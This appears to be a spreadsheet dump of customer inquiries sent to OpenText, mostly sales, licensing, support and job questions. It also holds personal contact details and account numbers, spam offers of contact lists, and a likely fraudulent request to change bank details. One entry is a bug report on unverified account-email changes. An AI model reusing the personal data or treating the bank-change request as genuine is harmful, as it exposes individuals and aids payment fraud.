My name is Caley Rainford and I am a Business Analyst working on a CLM/Document Management Solution project at Blue Cross and Blue Shield of IL. Our business partners are currently using EMC xPression 4.5 SP1 and are very happy with it. We will beginning the RFP very soon and I have been unable to find a contact for xPression within the organization. Can you please connect me with a vendor contact for this product and let me know if there are newer versions available that we can include in RFP? Thank you!_x000D_
_x000D_
Caley Rainford </t>
  </si>
  <si>
    <t>I am trying to reach the knowledgebase to see how to change the Teleform database.  I recently changed my password and can no longer access the knowledgebase.  The website keeps asking me to confirm my email and I do but seem to be stuck in a loop.  It would be much appreciated if you could help me with both issues.</t>
  </si>
  <si>
    <t>I would like to inquire about upgrading to Encase Forensic._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>We are looking for a document management system for Capital Project portfolios</t>
  </si>
  <si>
    <t xml:space="preserve">Need to discuss our eDOCs renewal requirement. Please have someone call contact me. _x000D_
Thank you. </t>
  </si>
  <si>
    <t>We want to check your costs for the small business in order to establish our supplier supply chain for a financial undertaking, initially we are interested in your products._x000D_
CEM (CCM) and Business Network</t>
  </si>
  <si>
    <t>I am trying to register for access. I believe I had an account previously but cannot find my login info.</t>
  </si>
  <si>
    <t>Bitte um Rückruf._x000D_
Könne Sie VDA4906 DFÜ Daten für BMW in VDA4938 umwandel?_x000D_
MFG_x000D_
R. Jäger</t>
  </si>
  <si>
    <t>We have been experiencing a large amount faxes not going through with either a status of 'Fax Number Busy' or 'Problem Converting Fax Body or Cover Sheet'  We have rebooted the server and recycled power on the modem.  Neither has seemed to help.</t>
  </si>
  <si>
    <t>We would like to see the demo of OpenText ECM and see how it meets the need of MSS document management.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are an IT Consulting company in China market focused on legal and professional service industry, and we are looking for a BPM solution to fulfill our local customer demands for workflow management requirement. The ideal solution must be business user friendly (WYSIWYG), and powerful for customization._x000D_
_x000D_
Some of our team member previously have years of experience with LiquidOffice/APA, so we'd like to reach out to you to get the latest updates, and compare with other alternative solutions such as WorkflowGen, Pega and other open source based solutions. Our considerations includes the solution capability, integration with other industry software, pricing, local market support and product road map. And obviously our team's previous experience will be a huge favorable factor here. _x000D_
_x000D_
Please contact me by email since we are in different timezone (my team are located in Beijing and Shanghai, China), and hopefully we can be surprised again with the latest updates of the solution._x000D_
_x000D_
Regards,_x000D_
_x000D_
Lin Li_x000D_
Consulting Director_x000D_
CN: +86 15652652421 | US: +1 646 568 5391</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
I am a Cybersecurity Consultant working on behalf of ASM Research.  In the near future we will be conducting a security review for a customer that has several implementations of Documentum Content Management and that are looking towards moving to cloud offerings in efforts to modernize.  I am working on conducting a risk assessment to determine the responsibilities of a client that procures Documentum cloud services, what the client is responsible for configuring, and the inherit security capabilities within Documentum cloud offerings._x000D_
_x000D_
I am looking for white papers, technical documents, configuration guides, and any standard/stock Service Level Agreement documents that can help with this research.  Please let me know if these resources are available and where they might be located.</t>
  </si>
  <si>
    <t xml:space="preserve">I am attempting to download the free version of EnCase Imager, however the link takes me to opentext.  I created an account and verified the email, however it continuously takes me back to this site rather than downloading the program.  </t>
  </si>
  <si>
    <t>I received the standard email for password reset.  When trying to update the password I am getting the following message:  'An error occurred updating password'</t>
  </si>
  <si>
    <t>I have a few users based in Milan who are moving from Windows 7 to Windows 10. They have the Open Text Analytics Designer application installed - but do not have the licence details - since these applications were installed by the desktop support team who have now left. I need both the source installation and serial number that for this application. Please can you assist?</t>
  </si>
  <si>
    <t>Hi there,_x000D_
I would like a quote to renew out EnCase license.</t>
  </si>
  <si>
    <t>I'd like to discuss a new requirement for VitalityHealth around a cloud-based OpenText solution for a new project please.</t>
  </si>
  <si>
    <t xml:space="preserve">****2ND REQUEST****_x000D_
_x000D_
I would like to know our license status. It shows expired since 07/18. If we paid, we need the update. </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour Monsieur, Madame,_x000D_
_x000D_
Suite à votre demande nous devons procéder à la mise à jour dans notre système de vos coordonnées bancaires._x000D_
Pourriez-vous nous confirmer par retour de mail que vous procédez bien à un changement de compte bancaire et nous confirmer l’IBAN et le code BIC ci-joint._x000D_
FR76 1168 9007 0000 6580 2701 870 - CITIFRPP _x000D_
_x000D_
Vous remerciant par avance pour votre aide._x000D_
Bien cordialement._x000D_
Berit Laureys_x000D_
</t>
  </si>
  <si>
    <t>Good afternoon dear Sirs,_x000D_
_x000D_
We are currently revisioning old contracts and procedures._x000D_
For this we need some information from you on the following details._x000D_
1. Which eMail address is linked to our UK Telex no.? Our account no. is TDD01339._x000D_
2. If we want to send a Telex to one of our vessels, are the following two address examples still valid (with regard to their structure)? tlx.0585453847056@ipmsg.com / 453847057@inmc.eik.com_x000D_
3. Is there any documentation available for the email to telex and v.v.?_x000D_
4. Could you kindly provide us the current tariff for the email to telex?_x000D_
_x000D_
Thanks and best regards_x000D_
Sigrid Apel</t>
  </si>
  <si>
    <t>We are happy using our Guidance TD2u duplicators. We are considering buying TDA7-1/2/3/4 adapters. Can we use those adapters in combination with our TD2u-duplicators? Or do we also need (extra) bridges?_x000D_
_x000D_
regards,_x000D_
Erwin</t>
  </si>
  <si>
    <t>is it known date to end of life/support for Qfiniti 10.3?</t>
  </si>
  <si>
    <t>Need access to My Support and complete access in Opentext website for enhancing my skills.</t>
  </si>
  <si>
    <t>I am opening  a new State Farm Agency and need pricing for services</t>
  </si>
  <si>
    <t>Wanted to reset my password but no new password will be accepted._x000D_
I tried different words - always the same result - Error updating the password_x000D_
No hint what went wrong</t>
  </si>
  <si>
    <t xml:space="preserve">looking for Archiving solution </t>
  </si>
  <si>
    <t>Madame, Monsieur, _x000D_
_x000D_
Pourriez-vous nous envoyer une copie du contrat qui lie notre société Renory SA (Belgique)  avec la vôtre? _x000D_
_x000D_
Un tout grand merci d'avance._x000D_
_x000D_
Bien cordialement, _x000D_
_x000D_
Kevin Sante</t>
  </si>
  <si>
    <t>Sorry, I can't use "My Support" to ask questions, please help me solve,Thanks.</t>
  </si>
  <si>
    <t>Worked in Tcs India as documentum wdk developer . Having work visa in Sweden.willing to join your organisation.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We are trying to automate fax acknowledgements for trade orders.We would like to speak/meet someone regarding this </t>
  </si>
  <si>
    <t xml:space="preserve">I want to buy VAN Services. </t>
  </si>
  <si>
    <t>MR</t>
  </si>
  <si>
    <t>Not able to open any support ticket even though we are having support contract.</t>
  </si>
  <si>
    <t>I want to buy VAN services.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a demo/quotatio from a local partner or office </t>
  </si>
  <si>
    <t xml:space="preserve">Unable to access my support page </t>
  </si>
  <si>
    <t xml:space="preserve">My customer has Open Text Exceed running on a Windows server 2008R2 server hosting Remote Desktop Services and whomever configured Exceed did not lock it down and one of the users has placed a password on Xconfig.  No one is admitting to the password so no one can give us the password that was placed on it so we can log in and remove it.  I would like to know if there is any documentation that explains how to remove the password without having to uninstall and reinstall the application.  </t>
  </si>
  <si>
    <t>Hello I am Bong-Gon Chae_x000D_
_x000D_
I passed the Phase I of the opentext EnCase Certificated Examiner. _x000D_
_x000D_
I sent an e-mail with .WibuCmRaC file to support@opentext.com On Feburary 28, 2019._x000D_
but there was no reply. _x000D_
_x000D_
The Phase II exam is limited in duration,_x000D_
Please send me the License Activation file as soon as possible after checking it._x000D_
_x000D_
Thank you for the help of the Support Center.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We usually use capstone-logistics website from application x tender- CA for receiving document we use for working_x000D_
However, These days Something weird things happened._x000D_
The other company said they uploaded all documents but, We can not able to see them " No document found" _x000D_
_x000D_
Please advise us what is going on. </t>
  </si>
  <si>
    <t>Hello _x000D_
_x000D_
I am Daniel Lee from Techtimes with 5 Million visitors monthly. _x000D_
_x000D_
Please Google "Best Technology Law Firms in Chicago" and you will see our Techtimes post on the 1st page of Google. (This is example we did for our client.) _x000D_
_x000D_
We will do the same for article below as well. _x000D_
_x000D_
" Top 5 Best Artificial Intelligence Software in 2019" _x000D_
_x000D_
Or you can suggest best keyword for your business. _x000D_
_x000D_
Please, let me know if you are interested to be featured No.1. _x000D_
_x000D_
For you info, techtimesco is our corporate site and techtimes is our publication._x000D_
_x000D_
Thank you._x000D_
_x000D_
Best Regards,_x000D_
Daniel Lee</t>
  </si>
  <si>
    <t>Interested in hearing more about OpenText as a document management system.</t>
  </si>
  <si>
    <t>Where can I purchase a instructional video to lean how to operate my Hummingbird Helix 5 G2 Chirp DI GPS  serial # 17022102-0474_x000D_
Thank You</t>
  </si>
  <si>
    <t>Your Indeed Job Application portal does not accept resumes, nor cover letters.</t>
  </si>
  <si>
    <t>I would like to know if there are classes scheduled in the near future for the following courses.  Please let me know the dates and price.  Thank you._x000D_
1.	3-1114 Open Text - eDOCS DM Designer Techniques _x000D_
2.	Using OpenText Email Filing, eDOCS Edition v3.2.2_x000D_
3.	3-1117 Open Text eDOCS Email Filing (formerly 337)_x000D_
4.	3-1120 OpenText Records Management for eDOCS_x000D_
5.	2-0122 Records Management and Physical Objects</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to download EnCase Imager and have been unsuccessful.  Can you please provide me with a link or a zip file with the exe?  Thank you. </t>
  </si>
  <si>
    <t>Hi:_x000D_
_x000D_
I am helping to complete a competing renewal application.  The HBTRC currently has a RightFax Account (Fax:  617-850-8711).  I have already spoken with Winston (866-323-9707).  Can you please provide documentation that OpenText/RightFax/Fax2Mail is FIPS (Federal Information Protection Standard) 140-2 compliant?_x000D_
_x000D_
Thank you in advance!_x000D_
_x000D_
Best,_x000D_
Dave Ennulat</t>
  </si>
  <si>
    <t>Hi there!_x000D_
_x000D_
I was told that you are using Yoggy's Money Vault E-Mail Scraper. Would you recommend it? Is it good for gathering leads?_x000D_
_x000D_
I was given your site on an SEO forum._x000D_
_x000D_
Cheers mate. Look forward to hearing from you as I want to buy the software.</t>
  </si>
  <si>
    <t>I am no longer able to login.  Does not recognize my email address.  I am trying to update my products on the Fisher Scientific website.</t>
  </si>
  <si>
    <t xml:space="preserve">Need login credentials to B2B  management portal </t>
  </si>
  <si>
    <t>What is the prerequisite administration training for OpenText Output Server Web Delivery Bundle v16.4.</t>
  </si>
  <si>
    <t>Hello, my name is Rex Pyron and I work for BASF in Huntsville, Alabama (with our corporate office located in Iselin, NJ._x000D_
We currently conduct business with you and the account number I have is US01-23040 and I am trying to determine what activity or for what purpose this activity is conducted to ensure it is still a necessary service._x000D_
Can you please provide as much detail as possible explaining what service you provide for the account number mentioned previously?_x000D_
_x000D_
Thanks_x000D_
Rex</t>
  </si>
  <si>
    <t>OTCS Ticket 4113693 TSPROGTA response was given with links to opentext connect however neither my password or the password reset work. - The password reset just gives an error that "password update failed" - Did not use a previous password.</t>
  </si>
  <si>
    <t>I need pricing on the Redact-it product.  We are in the process of an eDiscovery and we need a tool that simplifies the redaction process._x000D_
Thanks_x000D_
Brian Celardo</t>
  </si>
  <si>
    <t>Will be releasing an RFP for an Enterprise Document Management system. OpenText has been identified as a potential partner for this type of solution. Looking to work with a member of the business development team on this sourcing initiative.</t>
  </si>
  <si>
    <t>I am looking for Documentum EDMS for my organisation. please send me your contact details or provode me the details of edms.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Our users are getting an error message that our Captiva OpenText licenses have expired yet we just submitted the renewal in August 2018 and should be fine until August 2019. Please advise.  _x000D_
_x000D_
Many thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there... Just as an FYI: the Canadian and Ontarian flags atop your Rideau office location have been at half mast for more than two months. Someone needs to contact the building maintenance and have them raised to full height again. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are right person to discuss about the updated database of Cyber security._x000D_
_x000D_
We have the complete contact details and verified email addresses of CEO, CIO, CTO, CSO, CFO, Business Development, Country Manager, Regional Manager, Head of Operation, Head of Architecture, IT Director, HR Director, Head of Logistics, Head of Sales &amp; Marketing, Chief development officers, Presidents, Directors and all manner of people from various industries who might be interested in your product/services._x000D_
_x000D_
Sectors: Finance, Government, Oil &amp; Gas, Military, Legal, Banking &amp; Finance, Education, Aviation, IT, E-commerce, Operational Technology, Public sector, Insurance, Utilities &amp; Info Security, Auto Trader Group, Secondary Navigation, Business Services, Financial Services, Healthcare &amp; Life Sciences, Hotel &amp; Travel, Manufacturing &amp; Automotive, Media &amp; Entertainment, Online Gaming, Public Sector, Retail &amp; Consumer Goods, Mobile Technology, Software &amp; Technology, Water and Wastewater Systems Sector, Nuclear Reactors, Materials, Waste Sector, Defense Industries and many more._x000D_
_x000D_
Kindly let me know your target criteria so that we can provide you exact counts associated with you criteria:_x000D_
_x000D_
Target Industry :_x000D_
Target Job title :_x000D_
Target Geography:_x000D_
_x000D_
Regards,_x000D_
Emily Lauren</t>
  </si>
  <si>
    <t xml:space="preserve">I want to apply for Certification, Please let me know all the details._x000D_
_x000D_
Thanks!! </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking into eFax solutions that can be flexible as well as integrate with different systems easily. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Los casos en los cuales el número de caso de carta fianza se presenta en blanco ocurren en horas donde se presenta un error de Null Pointer en un componente de XCP llamado BPS que se encarga de procesar todos los Stateless Process, situación que no ocurre en UAT._x000D_
La llamada al Stored Procedure de generación del número de caso se realiza desde un Stateless Process. La secuencia si avanza de valor por lo que el problema no es el Procedure._x000D_
Se presentan caídas del BPS (ocurren aleatoriamente) y poder solucionar este tema lo más pronto posible. _x000D_
</t>
  </si>
  <si>
    <t>Dear Team, I would like to offer an idea of improvement for Enterprise Content Management so that the user can effectively and instantly control the versions of the documents, resulting in savings in time and cost as well as risk reduction. I would appreciate some appropriate contact person. Thank you</t>
  </si>
  <si>
    <t>we have purchased extra software/network-based licenses for EnCase during our recent renewal. the team said it was never received._x000D_
_x000D_
Can you look into this matter _x000D_
_x000D_
quote number was 149896 - 1</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, _x000D_
_x000D_
We currently use Recommind which I believe we no longer have support for but have an issue with some of our processes failing._x000D_
_x000D_
We think this may be a crawler issue but need some guidance. We are looking for some support on these issues but would like to know what options are available to us. _x000D_
_x000D_
Thanks </t>
  </si>
  <si>
    <t>Hello - we have a mutual client Gardner Orthodontics.  They utilize your Fax2Email service but their previous IT vendor has left and did not leave any time of login information or service information.  What is the best way for us to regain access to their account?  Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, we are looking for assistance with upgrading our RightFax platform from version 10.6 to version 16. Currently our administrator with support rights with OpenText is out on unexpected leave and we are unable to create a support ticket. Our current contract number is 0012073565, if we could we would like to get a short meeting setup to discuss an upgrade path. </t>
  </si>
  <si>
    <t>The Nature Conservancy is embarking on a project to set up a Digital Asset Manager for its digital marketing efforts and would like to inquiry as to whether Open Text would be interested in participating in an RFI/RFP process.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in discussing about the contact list of Information and Cyber Security industry?_x000D_
_x000D_
We have complete list of : Head of IT, CISO, IT Team Leader, IT project management officer &amp; Operations Engineer, IT Development Manager, IT Director, Head Of Information Security, IT Manager, Head of IT Operations, Vice President Of Corporate Security, Vice President Of Corporate Security, Information Security Specialist, IT Governance and Security Manager, IT Security Head, Engineers, Architects, infrastructure, threat intelligence, threat hunting, application security, development, monitoring and analysis, security operations, incident response and forensics, Marketing/Sales/Business Development, Consultancy, Business/General Management and Other key decision-makers. _x000D_
_x000D_
Industries : Aerospace &amp; Defence, IT, Finance/Banking/Insurance, Education &amp; Training, Telecommunications, Retail/Wholesale Distribution, Media/Broadcasting, Medical/Health Care/ Pharmaceuticals, Distributor, Manufacturers and Suppliers, Reseller and many more who might be interested in your product and services._x000D_
_x000D_
Kindly mention below the details to understand your needs better;_x000D_
_x000D_
Target Industry :_x000D_
Target Job Title :_x000D_
Target Geography :_x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Kiyara James</t>
  </si>
  <si>
    <t>Pricing for Cloud Faxing Services.</t>
  </si>
  <si>
    <t>I unintentionally deleted a document. Is there any way to recover it?</t>
  </si>
  <si>
    <t>There is going to be a drive on 16th march,2018 in hyderabad and i got call and they said i will be informed via mail but i haven't got any mails.</t>
  </si>
  <si>
    <t>We currently have Version 9.7.1 of livelink server hosted on a windows 2003 box._x000D_
We are planning to upgrade the server and to a newer version of livelink 10.0.0_x000D_
We wanted to know the following:_x000D_
1) can we run the current version (version 9?) on windows server 2012, or newer?_x000D_
2) What is the way to know which all workflows are we using_x000D_
3) Do you have a upgrade document for version 10 which instruct users on what to do regarding workflow changes._x000D_
4) What are the benefits of upgrading to a modern version, in terms of ux, features etc._x000D_
_x000D_
Regards,_x000D_
Naveen</t>
  </si>
  <si>
    <t>Salesforceerweiterung</t>
  </si>
  <si>
    <t>Training</t>
  </si>
  <si>
    <t>Is the June 11th DF-120 class in the Arlington or Dulles location?  I'm looking for offerings specifically at the Dulles facility.  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to better understand your offering, specifically in the campus bookstore market.  </t>
  </si>
  <si>
    <t>I am trying to download an update. Got a message that my license expired in 2018. Can you assist?</t>
  </si>
  <si>
    <t>Establishing a connection is having issues.</t>
  </si>
  <si>
    <t xml:space="preserve">Can I download a version of TeamSite?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I am trying to pay our invoice online and am receiving the following error:_x000D_
_x000D_
Server Error in '/' Application._x000D_
Object reference not set to an instance of an object._x000D_
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. _x000D_
_x000D_
Exception Details: System.NullReferenceException: Object reference not set to an instance of an object._x000D_
_x000D_
Source Error: _x000D_
_x000D_
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below._x000D_
_x000D_
Thank you,_x000D_
Bill</t>
  </si>
  <si>
    <t>Want to understand why we were not offered extended support option on our last Documentum D2 renewal.</t>
  </si>
  <si>
    <t>Please send cost and parameters for this product for a law firm 2-10 persons.  Thank you.</t>
  </si>
  <si>
    <t>Hi, We are SME and looking to automize our invoice process and  Document management system. Understand you have a product / solution to meet our needs. Pls do connect to understand the same.</t>
  </si>
  <si>
    <t xml:space="preserve">Can someone please assist in getting Ortho and its staff member Misa the appropriate credentials.   This request has been made several times, the client has submitted tickets and has had no resolution to the situation.  _x000D_
_x000D_
I am meeting with the CTO today and will spend 10 mins of an important meeting apologizing for this situation.  _x000D_
_x000D_
If there is an issue, please let me and the client know.  _x000D_
_x000D_
Can someone please assist in getting Ortho and its staff member Misa the appropriate credentials.   This request has been made several times, the client has submitted tickets and has had no resolution to the situation.  _x000D_
_x000D_
I am meeting with the CTO today and will spend 10 mins of an important meeting apologizing for this situation.  _x000D_
_x000D_
If there is an issue, please let me and the client know.  _x000D_
_x000D_
Thanks, Gil_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello._x000D_
_x000D_
1. Is it possible to acquire support for Webtop 6.5 SP2?_x000D_
_x000D_
2. Also i'm unsure if my company (or "Rosenergoatom" or "Rosatom" - my company is a part of both) have support contact for Documentum products already. Could you please check?</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je travail actuellement sur la version 16.4 de documentum. _x000D_
Je recherche des informations sur les navigateurs compatibles avec cette version._x000D_
Pourriez-vous m'aider svp ._x000D_
Je vous remercie d'avance.</t>
  </si>
  <si>
    <t>I'd like to learn about your OpenText Capture Recognition Engine (RecoStar) licensing and capabilities.  Accuracy rates, template management, and licensing/pricing models.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
_x000D_
I am a second-year student at the University of Exeter, studying for a BA (Hons) in Politics and Sociology, with an interest in developing skills within the environment of a tech company. _x000D_
_x000D_
I was wondering if OpenText is accepting applications for a couple of months over the summer (June-September 2019)? _x000D_
_x000D_
If you are able to consider me for a summer position and would like a cover letter, please do not hesitate to contact me._x000D_
_x000D_
Thank you in advance for your consideration. _x000D_
_x000D_
Yours Faithfully,_x000D_
Sophie Taraniuk </t>
  </si>
  <si>
    <t xml:space="preserve">Purchased Brava Desktop yesterday. Installed it this morning on my machine, but when I try and load a drawing, I get the message "Invalid License, The MAC address in the license does not match any MAC address on this computer." Can you please assist me?_x000D_
</t>
  </si>
  <si>
    <t>dear manager,_x000D_
     how are you?_x000D_
   glad to know your import products from china._x000D_
   we help you finish order supervise process safely as your purchase/service agent._x000D_
  as chinese,we are expert on verify factory divide traders out by garther products and prices._x000D_
  we help you ensure the goods' quality;arrange loading and shipment safely by smooth troubles with supplyer timely;protect payment loss happen by discrning false deal._x000D_
     single one aid service:pls relate us to confirm fees amount._x000D_
    all process aid:by confirm order scale and factory location,only total 100-250usd as fees,we charge all      things for you: _x000D_
     1.garther products/prices and confirm order from real factory_x000D_
       (or buyer can do this step with sellers directly)_x000D_
     2.supervision quality and production._x000D_
     3.container loading supervision_x000D_
     4.smooth shipment _x000D_
     (if need,garther samples before order/loading as deal proof)_x000D_
      with our aid,save your visit time,energy and more than 1000usd'trip cost every time ._x000D_
_x000D_
       after successful cooperation with sellers with us,no worry bad quality or false goods._x000D_
       inform your boss fees will be remedy by getting good plant prices. _x000D_
_x000D_
       pls keep our informaiton for futurer need_x000D_
_x000D_
       best regards_x000D_
         rony_x000D_
_x000D_
      General Manager_x000D_
Company:Seven-Color-Stone Indusry Service Limited_x000D_
     Add:No105,yuanboyuan street,zhengding new zone,zhengding county.china_x000D_
     Tel:+8615930153316  Fax:+8615930153316 _x000D_
     Web:www.import-aid.com_x000D_
     Email: tradeaid@import-aid.com_x000D_
     Skype: tradeaidservice@outlook.com_x000D_
     Wechat: tradeaid       QQ: 3358009198</t>
  </si>
  <si>
    <t>Hello._x000D_
We are a StreamServe customers. Our Customer ID is SE1030401. Were are upgrading StreamServe from version 4.1.2 to 5.6.2. Can you provide me a new license file?_x000D_
_x000D_
Regards.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to apply for a position Sr. HRBP but I am unable to upload my resume. Kindly help. </t>
  </si>
  <si>
    <t>Is it possible to know 2-3 resellers names for Livelink OpenText?_x000D_
We are based in lugano (Switzerland), and we would like to open a discussion to renew  the annual maintenance._x000D_
Many thanks for a feedback</t>
  </si>
  <si>
    <t>AO</t>
  </si>
  <si>
    <t>Hi, I just want a quotation of your ECM/Capture/Integration and Classification products, including BPM, for 10.000.000 documents historic and an estimated 3.000.000 pages/month. Best Reagrds</t>
  </si>
  <si>
    <t>Sir ,good morning_x000D_
I serve as a staff officer in NRDC-GR (Thessaloniki, GREECE). I would like to buy the exceed version 15 program. Which are the procedures._x000D_
Thank you in advance._x000D_
Chatzimallis Argyrios</t>
  </si>
  <si>
    <t>Hi Team_x000D_
Need you help to provide date details of maintenance support, end of support or end of life of ADA BY OT 10.5</t>
  </si>
  <si>
    <t xml:space="preserve">Email verification issue,bypassing email verification_x000D_
_x000D_
Hai sopentext team,i found Email verification issue at opentex,site verify new email when new user sign up but user can change email after login without any verification and date limit_x000D_
_x000D_
_x000D_
_x000D_
impact_x000D_
---------_x000D_
_x000D_
can change account email which have no access(victim email), prevent victim from sign up with her/his own email address_x000D_
_x000D_
_x000D_
steps to reproduce_x000D_
-------------------------_x000D_
_x000D_
1. go to opentext site and sign in_x000D_
_x000D_
2. fill the form with your details(use your email which owned you)_x000D_
_x000D_
3. go to your email inbox and click verify _x000D_
_x000D_
4. now account is verified_x000D_
_x000D_
5. now go to manage my account section and replace email with any email which you have no access._x000D_
_x000D_
6. now account email is changed without any verification_x000D_
_x000D_
7. successfully reproduced_x000D_
_x000D_
_x000D_
how to fix_x000D_
--------------_x000D_
_x000D_
1. always verify email when changing to prevent abuse._x000D_
_x000D_
_x000D_
if you have any doubt, contact me _x000D_
_x000D_
thanks_x000D_
</t>
  </si>
  <si>
    <t>Buen dia_x000D_
Pertenezco a una escuela de reciente adquisición, deseo información para contar con la plataforma para los cursos en línea. agradeceré me envíen la información via correo a rocio.h.urias@gmail.com</t>
  </si>
  <si>
    <t>Hi._x000D_
I have been informed that due to the upgrade scheduled for Q2 2019 will disable the use of WebDAV and that we need to move to a browser plug in. If true, please send details of the upgrade, and also include any Terms of Use and Data Privacy Policy documentation._x000D_
_x000D_
Thanks_x000D_
_x000D_
Steve Olds</t>
  </si>
  <si>
    <t>Hi,_x000D_
Your employee Tuomas Kettunen used our Day Office on December and haven't paid the invoice yet. I tried to reach him but the email couldn't get through and the email says he doesn't work for you anymore. Could you please contact us by email so we can discuss about the payment? Thank you!</t>
  </si>
  <si>
    <t>we are looking to train our resources locally on below courses, can you please advise how can we move this forward? _x000D_
1. 4-4202 OpenText MBPM 9.x Foundation_x000D_
2. 5-4210 OpenText MBPM 9.x Certification</t>
  </si>
  <si>
    <t xml:space="preserve">Dears,_x000D_
_x000D_
we are a Saudi based company, a client approached us with these requirements:_x000D_
-	They want to eliminate the use of old fax machines and use a software Fax solution (Fax server)._x000D_
-	send, receive operations should be done through clients PC's._x000D_
-	They have 10 external fax lines._x000D_
-	They have around 750 to 1000 users._x000D_
-	They might want to use this solution for different branches, offices._x000D_
Kindly send us what products do you have that fit our requirements and a quotation._x000D_
</t>
  </si>
  <si>
    <t>Unable to access support portal post log in</t>
  </si>
  <si>
    <t>Anfrage für ein Prozessmanagementsystem, d.h. Prozesse darstellen, verknüpfen, Workflows, Auditmanagement, ....</t>
  </si>
  <si>
    <t>My organisation is working in Renewable Energy sector. We are looking for EDMS software that helps in managing large scale of engineering data. Please provide complete details about Documentum EDMS like cost per user, brochure and short demo video. I appreciate your quick reply.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I wish to inquire if my online job application for Senior Director, HR Business Partner went through your job portal.  For some reason, I did not notice a confirmation note or email.  Please advise._x000D_
_x000D_
Thanks,_x000D_
Geraldine Guerrero</t>
  </si>
  <si>
    <t>Hi I would like to check if it is possible to convert existing dongle license to software license and what is the process involved?</t>
  </si>
  <si>
    <t>We've recently moved to Windows 10 and a user tried to open a document from her browser. The error message was that she couldn't run the ActiveX control._x000D_
We've redirected this page from Edge to IE so that we can integrate with addins better. This is an Excel file, (*.xls) and I was wondering if you could please send me links to these ActiveX controls so we can install and whitelist them for our new Windows 10 users? We obviously need the Excel one but also Word, etc if it's not just one that handles all Office docs._x000D_
Thanks and regards_x000D_
Ian.</t>
  </si>
  <si>
    <t>DO</t>
  </si>
  <si>
    <t>We would like to see a demo of Edocs. We are interested in a software for file administration</t>
  </si>
  <si>
    <t>I work with NetSuite and we have a number of prospects that use EZLink (in the campus bookstore space), we'd like to understand how your product works better and also see about opportunities to integrate</t>
  </si>
  <si>
    <t>I noticed someone from your company was looking at a building I have for lease in Phoenix. Can you tell me what you are looking for? The building that was being viewed is 4433 N 19th Ave, Phoenix, AZ 85015</t>
  </si>
  <si>
    <t>We have been a Metastorm user for years.  However, we were told by Thomson Reuters (who we purchased our Metastorm through) that Metastorm was end-of-life.  There would be no further maintenance or support.  We now see from the roadmap that you are actively developing this wonderful tool.  What would it take for us to open maintenance and support through OpenText and get access to the Metastorm upgrades?  We are currently on version 9.3.2.  Thanks!  Cheri</t>
  </si>
  <si>
    <t>IM2004282 - On March 4, our EDI began erroring/timing out when trying to connect. There has been no change on our end of the mailbox. Please check on this connection : AFCP AFCP003.</t>
  </si>
  <si>
    <t xml:space="preserve">I have questions about your OpenText solutions as we are currently evaluating some options for a DAM solution. </t>
  </si>
  <si>
    <t>I recently applied for the position of the Senior Business Consultant - Life Sciences and did not receive any confirmation that the application was received. _x000D_
Is there any way you can confirm this?</t>
  </si>
  <si>
    <t>When using First Class 16.109 I am unable to view .png images/screen shots in messages. Is FC designed that everyone can see .png files, or is there an option that I have not checked?_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
Principal is conducting an RFI and would like to contact someone on the sales team for Brava to complete the list of questions we have. I believe our RFI was forwarded to the team but I have not heard anything back. Could I have a sales rep reach out to me? _x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>I was wondering who the customer relationship manager is for our account. If we do not have one, then is there someone I can talk who helped Liberty Mutual onboard MediaBin. I was recently hired by Liberty as their Digital Asset Manager, and have some questions regarding our account with Opentext/ MediaBin.</t>
  </si>
  <si>
    <t>I need to get a quote to renew two licenses for Encase for my company.  Can someone provide this?</t>
  </si>
  <si>
    <t xml:space="preserve">Like to discuss demo and pricing </t>
  </si>
  <si>
    <t>We already are using the RightFax cloud based  service now, but are wanted to find out the cost of the OpenText Fax2Mail, because RightFax maybe going away, when our Ricoh contract is up. Can you tell me what pricing options you offer? Thank you</t>
  </si>
  <si>
    <t>RightFax services failed to start. We are getting the RPC Server is unavailable.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to see if there have been any security updates or upgrades for opentext exceed. I have looked over the site but have not been able to locate any. We are running v14. Can you direct me to where we can access them if there are any? </t>
  </si>
  <si>
    <t xml:space="preserve">1. What is the cost of the practical examination by itself if a student completes the 310 course and passes the written portion? _x000D_
2. Do you have to take the course 120 prior to 210 and 310? _x000D_
_x000D_
Thank you! </t>
  </si>
  <si>
    <t>We want to move from a limited homegrown documents management system to a robust 3rd party platform like yours.  I am evaluating which product is best.  I need a representative from your company to be my contact to answer questions, send information, pricing, etc.  Thanks, John (407-247-8700)</t>
  </si>
  <si>
    <t>Hi, I am looking for a no-cost test license of RightFax to test with our enterprise adverse event safety solution, Oracle Argus Safety.  We need to recommend a way forward with fax solution for 3 of the top 10 pharmas.</t>
  </si>
  <si>
    <t>is the following posting accepting resumes:  Sr. Analyst, Facilities, Real Estate_x000D_
